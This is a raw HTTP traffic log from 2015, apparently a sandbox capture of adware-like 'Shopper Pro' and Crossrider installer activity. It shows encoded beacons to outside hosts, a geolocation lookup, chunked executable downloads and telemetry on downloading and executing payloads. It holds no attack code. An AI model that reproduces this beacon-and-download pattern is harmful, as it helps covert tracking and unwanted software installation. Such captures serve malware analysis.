GET /app/ping.ashx?e=hNMAVKhukry7P4fECSsJwloXilXt x7lK8Uk6qaOqbIicvsFwQStENB87jgWTbK/3s5q cLFxyzJSKLVhW6rmW/5rCyD2Xgytgv4rmtJTtdjDTVY3IA3SiiQud1Q24EcqWLfaltpxWwAXYMT8ICd7 DRrDOGNmxc8Y9D7ZpfrCVfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxQzFrZZ4espH98S7GEeR3AenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIaibNUAqLVJBBHIQSAUi/qZ6ui3jv/3sP3EbLWmTIe6HPSZuizlKZS4vVGidJQzQbwcX153juosly7z014jPGHi9SV3844bx1g== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 01 Aug 2015 04:17:07 GMT
Content-Length: 0
GET /app/ping.ashx?e=A3ANzFv7fWAr54jemLLd4FoXilXt x7l6DyKvcFN9VsicvsFwQStENB87jgWTbK/3s5q cLFxyzJSKLVhW6rmW/5rCyD2Xgytgv4rmtJTtdjDTVY3IA3Sq2mie6K97bhs4164GCUCrHY6 CMJNDnNZ iO0G7IbrOitH7JkWOxZfyfwmWa4R8zkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mKGC96/uInTgPCo jLvL970WABgPsiU45GNURXUmydpYo7BIbpw2ovuk hMOF3swzZcIrLF/KDw30Dx2m 0F47aFzcNuM2tbw FqU0ZF4YO51d/yz32tmquaHkbuQuAqpFpXrulLecGSS4ZuIyp4CyD0lZpzINt8A HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 01 Aug 2015 04:17:07 GMT
Content-Length: 0
GET /app/ping.ashx?e=Ka qOJkckoWKccrnLzDz3jyMpz1Liwuqg5GyWpM1 hSRoZJTpqsyZxASc9FSZWyorVov04UjcEgpkJMMnIn2/i1ccdUWYYSC0dynvbrq8d7wsHnwsxHHbdtgpjL3X7N9nl1xOKDZuhXrGiiXWYz3NvgrB1VZh8CMsYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PNsA1iuxLaBHdtdgGHkZrI4k4Gm5vvSshtYpX C0wZa7n9ZpCSa7IeXQbvelEWRhJzI6WjgFlNrd6j7/wRBDsRoqvWX6JwkejqMehRdfaX6iZYn8TH3Pe3MlW9RFqOniqVRDsrPlqwdmkLLb35jLfrVLutmednZNQ== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 01 Aug 2015 04:17:08 GMT
Content-Length: 0
GET /app/ping.ashx?e=siwKo8d7dVSIItTUp4SEbQJu76sBMJpY2YTeaOaZJPFysSIQM/WMqhsgZm851Wm7Y4rWxtGruLEcdSxeBQrefTtdlsQvNjEsRp4Ckp mcZt7HEv67ptHclD/oBpUX5crnl1xOKDZuhX43G01TipW9rNM1MftkI9RcnDbXMoNEWZfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxQzFrZZ4espH98S7GEeR3AenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIQNLH6TecF 3BHIQSAUi/qZ6ui3jv/3sP3EbLWmTIe6HPSZuizlKZS4vVGidJQzQbwcX153juosly7z014jPGHi9SV3844bx1g== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 01 Aug 2015 04:17:08 GMT
Content-Length: 0
GET / HTTP/1.1
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:51 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}
GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Sat, 01 Aug 2015 01:57:22 GMT
Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT
ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"
Accept-Ranges: bytes
Server: AmazonS3
Age: 8378
Content-Range: bytes 0-249999/2707024
X-Cache: Hit from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Ghti80leq55ItkvywbrYJ8BzYtRC6OjFNyx0X0ng5uxvEYWNC8c79Q==
<<< skipped >>>
GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=500000-749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Sat, 01 Aug 2015 01:57:22 GMT
Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT
ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"
Accept-Ranges: bytes
Server: AmazonS3
Age: 8378
Content-Range: bytes 500000-749999/2707024
X-Cache: Hit from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: qQlQfQ9KwmM2O2LpDUhYw-xAF5kjMojHZF3aWDfJhdImYDCMI22DtA==
<<< skipped >>>
GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=1000000-1249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Sat, 01 Aug 2015 01:57:22 GMT
Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT
ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"
Accept-Ranges: bytes
Server: AmazonS3
Age: 8378
Content-Range: bytes 1000000-1249999/2707024
X-Cache: Hit from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: _B7Wd1H_gKZbto9AMy0JVj7yV6Snn0ucJIxbYUFu8fvjGIUuJQCStg==
<<< skipped >>>
GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=1500000-1749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Sat, 01 Aug 2015 04:17:02 GMT
Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT
ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 1500000-1749999/2707024
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Fg6Jdc2yf3aiSVLc-PbgKyN_xgcmv69QrBUudisXG-c5OZje74y2lQ==
<<< skipped >>>
GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=2000000-2249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Sat, 01 Aug 2015 01:57:22 GMT
Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT
ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"
Accept-Ranges: bytes
Server: AmazonS3
Age: 8380
Content-Range: bytes 2000000-2249999/2707024
X-Cache: Hit from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 75qr-Ek7Fbcr4RD1hoZZBEIR3zND28KXNYBd0iXb3jWIhPdhoFkaKQ==
<<< skipped >>>
GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=2250000-2499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Sat, 01 Aug 2015 01:57:22 GMT
Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT
ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"
Accept-Ranges: bytes
Server: AmazonS3
Age: 8380
Content-Range: bytes 2250000-2499999/2707024
X-Cache: Hit from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 3lpspDX6tjC8_ARcgDnFWEAint6_e6UPBJAGRMJ0A5c8j6f22Gg0cQ==
<<< skipped >>>
GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=2500000-2707023
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 207024
Connection: keep-alive
Date: Sat, 01 Aug 2015 01:57:22 GMT
Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT
ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 2500000-2707023/2707024
Age: 8381
X-Cache: Hit from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 2sAMLKilT9_HfyT_tBlTMQxWRbh4QJDrs2RthMa7L5P7979a7X7iDg==
<<< skipped >>>
GET /utility.gif?error=done_mem_0&report=mini_s&ver=1729&action=na&ms_vr=3&clock=22610&rnd=18667 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 01 Aug 2015 04:18:00 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GET /utility.gif?error=start&report=mini_s&ver=803&action=na&ms_vr=3&clock=0&rnd=23400 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 01 Aug 2015 04:17:38 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GET /utility.gif?error=start&report=mini_s&ver=1729&action=na&ms_vr=3&clock=16&rnd=23400 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 01 Aug 2015 04:17:38 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GET /spdbt/shoppy/snsch7.exe_b HTTP/1.1
Host: dl.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:39 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1438276439"
Last-Modified: Thu, 30 Jul 2015 17:13:59 GMT
Cache-Control: max-age=1462
Content-Length: 2088396
Content-Type: text/plain
X-HW: 1438402659.dop008.fr7.t,1438402659.cds011.fr7.sr,1438402659.dop007.dc1.r,1438402659.cds003.dc1.c,1438402659.cds011.fr7.pr
<<< skipped >>>
GET /app/ping.ashx?e=hNMAVKhukry7P4fECSsJwloXilXt x7lK8Uk6qaOqbIicvsFwQStENB87jgWTbK/3s5q cLFxyzJSKLVhW6rmW/5rCyD2Xgytgv4rmtJTtdjDTVY3IA3SkUvubeDU93VIs0AEv1kh1DKJj24mv8XjnS5StnPX94HWqnaKp4YBMTpBU9U/r/dsNyvhlGeipNV6LgZQ8/fOZCiThn9Pg6 S9OHlqnpoaqAkC1fv30UfvKld0ylS1bImyBTYvJf3vjRbJ1qu5mi2nG/wC513n 0HRZRXx49nRJ1TcWL70UkzVrp4nRJFoUZgp4Yvmw1YuoPQOGdJX7Ys4OCi0N7aB6YG6hHY oh5wmy9pSoWtDn2v0LZyn40Iw2XriTPqtAWXps8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFawUbmkSx215x4j1VNOEsndx0FrV7x5rPXEmrfQGcHKRxmOFGE02dWYVMq3nYMuxdi r7NiSQEydOFU5mMfA2YwPKMRKx/Hy aYD1xi6d0GBG/fDcmPtyb/6CnTX MB8zBtIY2WtWIlXvh37zCULcAJjU0tqMnFrjE= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 01 Aug 2015 04:17:07 GMT
Content-Length: 0
GET /app/ping.ashx?e=M/g8cQcNP KIItTUp4SEbcPJzAExCGuv2YTeaOaZJPFysSIQM/WMqhsgZm851Wm7Y4rWxtGruLEcdSxeBQrefTtdlsQvNjEsRp4Ckp mcZsxEz6FfERdwJw4LO6ub5l5rBjqlmzKnb1Tx2y1fQnwbvamwkcEQSgOU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOTzbANYrsS2gR3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHl0G73pRFkYRgncIi2chNT3eo /8EQQ7EaKr1l icJHo6jHoUXX2l omWJ/Ex9z3tzJVvURajp4qlUQ7Kz5asHZpCy29 Yy361S7rZnnZ2TU= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 01 Aug 2015 04:17:07 GMT
Content-Length: 0
GET /app/ping.ashx?e=siwKo8d7dVSIItTUp4SEbQJu76sBMJpY2YTeaOaZJPFysSIQM/WMqhsgZm851Wm7Y4rWxtGruLEcdSxeBQrefTtdlsQvNjEsRp4Ckp mcZuBRen/2tOqQlo8H6qezB8RXqkSFNls Rah094EYGQaeEZDP9BIkAtrSutvT1yx4dwIunIXNkmXKy5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAc/1td01976VC51CUbXbhryEU5MDCXDxgXw8weuLV7sL008nm/3qTHBtVZMWj5VvxhAswSJxuoqNeoiz5XsOzoJG5lkiLn 2iON4UrLMQQDZPMFopdoQp3MXCrArhn8sH AS7DCm3ZJZeNpBJRUpe7bX0UJxZodl69 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 01 Aug 2015 04:17:08 GMT
Content-Length: 0
GET /utility.gif?report=fdata&f=3&c=1729&i=35&n=ms_about_to_exc&rnd=28949 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 01 Aug 2015 04:17:42 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GET /utility.gif?report=fdata&f=3&c=1729&i=20&n=ms_start_download&rnd=916 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 01 Aug 2015 04:17:39 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GET /web/gf/all/setup.exe_d HTTP/1.1
Host: dl.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:39 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1438313683"
Last-Modified: Fri, 31 Jul 2015 03:34:43 GMT
Cache-Control: max-age=461
Content-Length: 2113811
Content-Type: text/plain
X-HW: 1438402659.dop006.fr7.t,1438402659.cds008.fr7.c
<<< skipped >>>
GET /2377.ashx?e=2fVCHF6kf8gQ0V45w4Sc0WByKcxzlv580m7i 9H0u1uAMRxV Cn6lnsc7hbJtTJHDHGXB7YFOPGAqkMremTu1UAw87IpRxOgd/XCztdoPbJFiFlIaXxqEcmxw368usKjvx7ENkzRxOw/caEgn1aywj5N0jWsNR8MoexnI9SC14XbVwDStlFVZXVJgYQsPAh56xK0PQZ59GgROorJaaO22Hr5Jh 0vvS2sI9d zRUY660rXCKv72ck3a4leJj3gd30GxQkL QSvRXZhP8niUnuouQlrWxrEbh307rxaZ1a5R0XN4kzLp8byxoV5yxM aWz/mAL2f0kUvlxFm3ANXIVukv6L3jUTEetkfkXeiixz7VYzHpwFHNpOecXjUPxXOs63 4FUU7ahslKZixWyxYlhfMUt2wWrpAbmmceboMbQKhEXfc6iwiXOu Yv65 F7gLnsSLFHSKl92oOSCaAzXhNzKEv37udDSmkfVorzgpqzFQi2pphZpM0eXoYNe9IIH8NVcbx dWxSReJECB10wJoxWgtYjek0x0XbBjJK/aOU= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:07 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
GET /utility.gif?report=fdata&f=3&c=1729&i=30&n=ms_download_success&rnd=17999 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 01 Aug 2015 04:17:42 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GET /27944.ashx?e=uWabAt9SLcwLjT49fHfOTNDx0QK0tujFjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF8PMHri1e7C9NPJ5v96kxwbVWTFo Vb8YXwF8xC533FcDPI5dGTWg7/48CMVjnZqYc8xmpxiLTPoz9GdXwkjcG2M0isR26F8c7K4ihqKSxe0jgb6v7cXpPt vCrCw4vHoxi6nXHFmzl4UJIhz0JUpzEfEpjPND7Tv589gkZhC35q9md5CSrcUCSh4vJSfGWeuF gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBfDzB64tXuwvTTyeb/epMcG1VkxaPlW/GE= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:42 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
GET /27944.ashx?e=1ZEnpGuz/IQqQvvNc0/QxKGNjjUHyQp W1tgKrNy38lA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTQ6SaxLQh/qwXCfGg4gcTppNB3Tmp8 xhs IILilpWF0OiEhuPxDpVo0KXYjr4isejZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVei4GUPP3zmQok4Z/T4OvkuHPbyEzOU1sA== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:42 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
GET /utility.gif?report=fdata&f=3&c=803&i=30&n=ms_download_success&rnd=17999 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 01 Aug 2015 04:17:42 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GET /utility.gif?report=fdata&f=3&c=803&i=35&n=ms_about_to_exc&rnd=28949 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 01 Aug 2015 04:17:42 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GET /utility.gif?error=mem_strt&report=mini_s&ver=1729&action=na&ms_vr=3&clock=5110&rnd=8361 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 01 Aug 2015 04:17:43 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GET /spdbt/shoppy/snsch7.exe_e HTTP/1.1
Host: dl.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:39 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1438276447"
Last-Modified: Thu, 30 Jul 2015 17:14:07 GMT
Cache-Control: max-age=1461
Content-Length: 2088396
Content-Type: text/plain
X-HW: 1438402659.dop006.fr7.t,1438402659.cds024.fr7.sr,1438402659.dop005.dc1.r,1438402659.cds023.dc1.c,1438402659.cds024.fr7.pr
<<< skipped >>>
GET /utility.gif?report=fdata&f=3&c=803&i=20&n=ms_start_download&rnd=916 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 01 Aug 2015 04:17:39 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..
GET /utility.gif?error=done_mem_0&report=mini_s&ver=803&action=na&ms_vr=3&clock=22531&rnd=18667 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 01 Aug 2015 04:18:00 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..
GET /spdbt/shoppy/snsch7.exe_c HTTP/1.1
Host: dl.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:39 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1438276442"
Last-Modified: Thu, 30 Jul 2015 17:14:02 GMT
Cache-Control: max-age=2554
Content-Length: 2088396
Content-Type: text/plain
X-HW: 1438402659.dop012.fr7.t,1438402659.cds007.fr7.sr,1438402658.dop006.dc1.r,1438402659.cds025.dc1.c,1438402659.cds007.fr7.pr
<<< skipped >>>
GET /app/ping.ashx?action=uidCreated&userid={A12A645F-7F13-46EC-98C0-57B180FEB515}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&v=1.0.8654.1177&url=&title=&pingtext=&protocol=&size=0&ref=&browser= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.ytdownloader.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 01 Aug 2015 04:18:10 GMT....
GET /web/gf/all/setup.exe_a HTTP/1.1
Host: dl.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:39 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1438313675"
Last-Modified: Fri, 31 Jul 2015 03:34:35 GMT
Cache-Control: max-age=461
Content-Length: 2113811
Content-Type: text/plain
X-HW: 1438402659.dop006.fr7.t,1438402659.cds014.fr7.c
<<< skipped >>>
GET /16779.ashx?e=lnyQOXBgnIVgcinMc5b fOZ2TvHobpl2gDEcVfgp pZ7HO4WybUyRwxxlwe2BTjxgKpDK3pk7tXSS26A4HrgseLt6BhzfOsD0FbaakihgO1P17LdzRwGrcSywkF18Bl8YJpucY5gZaSI0uO8YCaEeHDt BwvUvK2OgXCEuEQ35bsk4IDaVDumfJR9y36AE8VUGeTCBaEQyQbe1ZN3pnb6zFxU5LviUXKRAQGkVD7mhWSCPTBz14MxScKZA7dr10wk5dpEt5PL7oIA44xPc2qom7c1W87ggrF6pqgVuVy 5fSGC/Mdcm7G BVy60SFak6tdBGbMT LaxCJELGDzYIEpSUHtL8QyxMw7HQ6UOrRmFylapLWfWeiOW7pPhPxmIJtngDOyc8OrMEe0ZxYaO0Z4LoX04Ef5YGASU331c/hmepeLfZWAU/ElPUufE6DKY9IO4kHWBb6nL9K5zKpbLSx0xM JMmHOf/3UB03ZmLOoILqrHF8gCihnYL0wot9Xvv4NbB6ns3CLtRDh0wyVSH8C6m5ZQjWuuGCVpHDePMpxUsF scXI mWdCbM6EeiW ZX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8WY515bwKb4/A== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:03 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
GET /29451.ashx?e=QHucCbLl /YLjT49fHfOTNcxGaPWyPpOjvdcLv9L0ULeyzV7AofXlljJzRxQxlEZ1rD0MhBpqdxv2upuoN/OX9aoPZj94HyT6LOwEGQvh2zV2TxY7/sL 44G r 3F6T7U6q7EvjWjEUpXTEKkNwLoRunJOmEe2tAEhmPvvKOaBJnrd89FhtM2ZOzMpVjzF1DJ1ANLsSNCmXNcQlgX3M502CabnGOYGWke9dSH 2S3SkStAZytkA54Y0S1nWxf2ZUZB6PWEkv//ugKlGaFWGmKrPJ0DN QuCj69QxV3C0qdKM1YNJ72n7uZgdETUPvQcwTankT3jqoI2swAhmPgoCunql2mR Jit5KoEjale7vIkdwEEqSCVwe/XD m2Vx1YJfOER8y559W1zAMMqIil745kZsURn/cxRj0 9JT4bx2oSZGh8MbdFFu4wvto3IW74upP5ChEmpd9HHVSuTi6RR1XT8KlLqjsANNN69riqxp5Z6LbpmNmFGDM2//e6a6AB1jT1RV/Lug9w/ UOvq3TV Xppilwb9x1QlTW7EcYYqf7r2hVIG5LbdW/BKYnNEj4sapDP2xI5hXE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:03 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
